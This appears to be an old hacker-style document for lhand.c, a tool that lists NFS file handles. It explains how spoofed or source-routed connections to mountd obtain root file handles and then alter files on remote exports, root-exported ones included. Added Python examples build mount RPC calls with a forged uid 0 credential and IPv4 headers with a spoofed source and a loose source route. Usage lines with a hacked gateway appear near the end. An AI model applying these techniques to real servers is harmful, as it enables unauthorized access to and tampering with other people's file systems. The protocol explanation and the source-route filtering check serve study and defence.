lhand.c

list all file handles via a TCP connection to mountd.

This was written to list the file handle of every exported file system that
can be mounted.  Although that may at first seem worthless, it is quite
useful.

NFS Overview
------------

Whoever designed NFS was most probably an idiot.  The entire authentication
of NFS rests on the file handle.  Once a client has obtained a file handle
from mountd, it can talk to nfsd directly without *ANY* further
authentication: nfsd does not ask where the handle came from, and with
AUTH_UNIX it simply believes whatever uid and gid the client puts in each
request.  One opaque 32-byte number controls the integrity and security of
an entire network.  I certainly would not put that level of responsibility
on one silly number.

Tricking the system
-------------------

mountd has an access list (the exports file) which limits an outside
attacker's ability to get at file systems.  While this list greatly improves
security, it is rather trivial to "spoof" the IP of your connection to
mountd.  mountd looks up the source address of your connection in the list of
hosts allowed to mount the requested file system; if it matches, it returns
the root file handle of that export.  Since you also choose the uid you
present to nfsd, the handle can then be used to change nearly any file on the
remote file system (everything not owned by root, as uid 0 from an untrusted
host is normally mapped to nobody).  Many administrators export file systems
-root to "trusted" hosts, which is much worse: requests that appear to come
from such a host are honoured as uid 0 rather than mapped to nobody, so an
attacker spoofing that host can modify files as root.  This is quite
dangerous.
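
The mount exchange the two sections above describe, as an added worked example
(not lhand.c, and not code from the author of this file): it builds the
MOUNTPROC_EXPORT and MOUNTPROC_MNT calls with an AUTH_UNIX credential, decodes
the export list and file-handle replies, and decodes a call the way mountd sees
it, so the point is visible in the bytes: the uid in the credential and the
32-byte handle are all the "authentication" there is.  Host names, the handle
bytes and the replies are constructed stand-ins; nothing is sent on the wire.

```python
"""NFS mount protocol (RFC 1094, appendix A) over a TCP record stream: added example,
not lhand.c.  Sample replies below are constructed by hand to stand in for mountd."""
import struct

MOUNT_PROG, MOUNT_VERS = 100005, 1
MOUNTPROC_MNT, MOUNTPROC_EXPORT = 1, 5
AUTH_NULL, AUTH_UNIX = 0, 1
FHSIZE = 32                      # NFSv2 file handle: a fixed 32-byte opaque blob
LAST_FRAG = 0x80000000           # TCP record mark: last-fragment bit | length

def xdr_string(s: bytes) -> bytes:
    """XDR string/opaque: 4-byte length, the bytes, zero pad to a 4-byte boundary."""
    return struct.pack(">I", len(s)) + s + b"\0" * (-len(s) % 4)

def auth_unix(uid: int, gid: int, machine: bytes = b"client") -> bytes:
    """AUTH_UNIX credential: every field is asserted by the caller and checked by nobody."""
    body = struct.pack(">I", 0) + xdr_string(machine)      # stamp, machinename
    body += struct.pack(">III", uid, gid, 0)                # uid, gid, no extra gids
    return struct.pack(">I", AUTH_UNIX) + xdr_string(body)

def rpc_call(xid: int, proc: int, args: bytes, uid: int = 0, gid: int = 0) -> bytes:
    """RPCv2 CALL to the mount program, framed for TCP."""
    msg = struct.pack(">IIIIII", xid, 0, 2, MOUNT_PROG, MOUNT_VERS, proc)  # CALL, rpcvers 2
    msg += auth_unix(uid, gid) + struct.pack(">II", AUTH_NULL, 0) + args   # cred, null verf
    return struct.pack(">I", LAST_FRAG | len(msg)) + msg

def export_call(xid: int) -> bytes:            # "what do you export, and to whom?"
    return rpc_call(xid, MOUNTPROC_EXPORT, b"")

def mnt_call(xid: int, path: bytes) -> bytes:  # "give me the root handle of <path>"
    return rpc_call(xid, MOUNTPROC_MNT, xdr_string(path))

class Reader:
    """Cursor over an XDR byte string."""
    def __init__(self, data: bytes): self.d, self.o = data, 0
    def u32(self) -> int:
        (v,) = struct.unpack_from(">I", self.d, self.o); self.o += 4; return v
    def opaque(self, n: int) -> bytes:
        v = self.d[self.o:self.o + n]; self.o += n + (-n % 4); return v
    def string(self) -> bytes: return self.opaque(self.u32())

def decode_call(rec: bytes) -> dict:
    """What mountd sees: the credential is just numbers the client chose."""
    xid, _, _, prog, vers, proc = struct.unpack_from(">6I", rec, 4)
    r = Reader(rec); r.o = 28                               # past mark + RPC header
    flavor, cred = r.u32(), Reader(r.string())
    cred.u32()                                              # stamp
    machine, uid, gid = cred.string(), cred.u32(), cred.u32()
    r.u32(); r.string()                                     # verifier
    return dict(xid=xid, prog=prog, vers=vers, proc=proc, flavor=flavor,
                machine=machine, uid=uid, gid=gid, args=rec[r.o:])

def reply_results(rec: bytes) -> Reader:
    """Skip the record mark and RPC reply header; raise unless MSG_ACCEPTED/SUCCESS."""
    r = Reader(rec)
    r.u32(); r.u32()                      # record mark (one fragment assumed), xid
    if r.u32() != 1 or r.u32() != 0:      # REPLY, MSG_ACCEPTED
        raise ValueError("not an accepted REPLY")
    r.u32(); r.string()                   # verifier
    if r.u32() != 0:                      # accept_stat SUCCESS
        raise ValueError("call failed (program/procedure unavailable?)")
    return r

def parse_exports(rec: bytes) -> list:
    """MOUNTPROC_EXPORT reply -> [(path, [hosts allowed]), ...]; [] means everyone."""
    r, exports = reply_results(rec), []
    while r.u32():                        # "value follows" for the next exportnode
        path, groups = r.string(), []
        while r.u32():                    # group list uses the same encoding
            groups.append(r.string())
        exports.append((path, groups))
    return exports

def parse_mnt(rec: bytes):
    """MOUNTPROC_MNT reply (fhstatus) -> (0, 32-byte handle) or (errno, None)."""
    r = reply_results(rec)
    status = r.u32()
    return status, (r.opaque(FHSIZE) if status == 0 else None)

def fake_reply(xid: int, results: bytes) -> bytes:
    """Constructed mountd reply: REPLY, MSG_ACCEPTED, AUTH_NULL verifier, SUCCESS."""
    msg = struct.pack(">IIIIII", xid, 1, 0, AUTH_NULL, 0, 0) + results
    return struct.pack(">I", LAST_FRAG | len(msg)) + msg

def fake_exports(exports) -> bytes:
    """Encode an export list the way mountd does (only used to build the sample)."""
    node = lambda path, groups: struct.pack(">I", 1) + xdr_string(path) + b"".join(
        struct.pack(">I", 1) + xdr_string(g) for g in groups) + struct.pack(">I", 0)
    return b"".join(node(p, g) for p, g in exports) + struct.pack(">I", 0)

# Constructed sample traffic; host names and handle bytes are made up.
SAMPLE_EXPORTS = [(b"/export/home", [b"trusted.example.com"]), (b"/usr/local", [])]
SAMPLE_HANDLE = bytes(range(FHSIZE))
EXPORT_REPLY = fake_reply(1, fake_exports(SAMPLE_EXPORTS))
MNT_OK_REPLY = fake_reply(2, struct.pack(">I", 0) + SAMPLE_HANDLE)
MNT_DENIED_REPLY = fake_reply(3, struct.pack(">I", 13))   # 13 = EACCES: not on the list

if __name__ == "__main__":
    for path, groups in parse_exports(EXPORT_REPLY):
        print(path.decode(), "->", [g.decode() for g in groups] or "everyone")
    print(decode_call(mnt_call(2, b"/export/home")))     # uid=0 claimed, nothing checks it
    print("handle:", parse_mnt(MNT_OK_REPLY)[1].hex())
```

Against a live server you would ask the portmapper (program 100000) for the
TCP port of program 100005, connect, write the bytes from export_call() or
mnt_call() and hand the reply to the parsers; that is the whole of the
"authentication" step, and the handle that comes back is what gets passed to
nfsd.  An EACCES in the MNT reply is the export list saying no, which is
exactly the check the spoofed source address gets around.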

Source Routed Attacks
---------------------

Although this is just one of the many network services that can be
manipulated with source routing, it is a very useful one.  Keep in mind that
*ANY* network service that bases authentication upon privileged ports or IP
address matching is vulnerable to source routed attacks.
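
The mechanism behind that claim, as an added example in Python (not vsr, slip
or any code from this file): it builds an IPv4 header whose source address is
the trusted host, whose destination is the attacker's gateway and whose LSRR
option names the real target as the remaining hop, and it walks the options
the way a receiving stack (or a filter that drops source-routed packets)
would.  All addresses are made up; nothing is sent, since that takes a raw
socket and a gateway on the path.

```python
"""IPv4 header with a loose source route (RFC 791 LSRR option): added example, not
vsr or slip.  Addresses are made up; nothing is sent on the wire."""
import socket
import struct

IPOPT_EOL, IPOPT_NOP, IPOPT_LSRR, IPOPT_SSRR = 0, 1, 0x83, 0x89

def checksum(data: bytes) -> int:
    """RFC 1071 ones' complement sum; 0 over a header whose checksum field is valid."""
    if len(data) % 2:
        data += b"\0"
    s = sum(struct.unpack(">%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xffff) + (s >> 16)
    return ~s & 0xffff

def lsrr_option(route) -> bytes:
    """type, length, pointer (4 = first address), the hops; EOL-padded to 4 bytes."""
    body = b"".join(socket.inet_aton(h) for h in route)
    opt = bytes([IPOPT_LSRR, 3 + len(body), 4]) + body
    return opt + bytes([IPOPT_EOL]) * (-len(opt) % 4)

def ip_header(src, first_hop, route, payload_len, proto=6, ttl=64, ident=0x1234) -> bytes:
    """Header whose dst field is the first router; route lists the hops after it,
    the last one being the real target.  src is whatever host we want to be."""
    opts = lsrr_option(route)
    ihl = (20 + len(opts)) // 4
    hdr = struct.pack(">BBHHHBBH4s4s", 0x40 | ihl, 0, 4 * ihl + payload_len, ident, 0,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(first_hop))
    hdr += opts
    return hdr[:10] + struct.pack(">H", checksum(hdr)) + hdr[12:]

def source_route(hdr: bytes) -> list:
    """Walk the options as a receiving stack would; return the LSRR/SSRR hop list,
    [] if there is none.  A defender drops any packet for which this is non-empty."""
    ihl = (hdr[0] & 0xf) * 4
    opts, i = hdr[20:ihl], 0
    while i < len(opts):
        t = opts[i]
        if t == IPOPT_EOL:
            break
        if t == IPOPT_NOP:
            i += 1
            continue
        ln = opts[i + 1] if i + 1 < len(opts) else 0
        if ln < 2:
            break                                    # malformed option; stop parsing
        if t in (IPOPT_LSRR, IPOPT_SSRR):
            body = opts[i + 3:i + ln]
            return [socket.inet_ntoa(body[j:j + 4]) for j in range(0, len(body), 4)]
        i += ln
    return []

if __name__ == "__main__":
    # Claim to be the trusted host 10.0.0.5, send via our gateway 192.0.2.1,
    # final hop the NFS server 10.0.0.20 (all constructed addresses).
    h = ip_header("10.0.0.5", "192.0.2.1", ["10.0.0.20"], payload_len=20)
    print(h.hex(), source_route(h))
```

A host that accepts the source route answers along the reverse of the
recorded route, so its replies come back through the same gateway; that is
why the trick needs a hacked gateway rather than just a forged source
address.  The defender's check is source_route(): a packet for which it
returns a non-empty list should be dropped, or at least have its route
ignored, which is what most current IP stacks do by default.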

-vsr-

VSR is a program that acts as a Virtual Source Routing interface to 
the ether.  It requires a hacked gateway to forward the source routed
packets and another machine to act as a host.  This program can be used
in a standalone fashion ->

host1% lhand some.host

and will return file handles to pass on to nfsd.

-slip-

Slip can be used with a hacked gateway much as vsr is.  A slip link is very
simple to reconfigure addresses on.

slip% lhand @gateway@target

I've heard people suggest using ifconfig(1M) to change the IP; however, I
think this would be quite disruptive and most probably break something.
If you come up with an idea, forward it!

Bang.  NFS sucks.
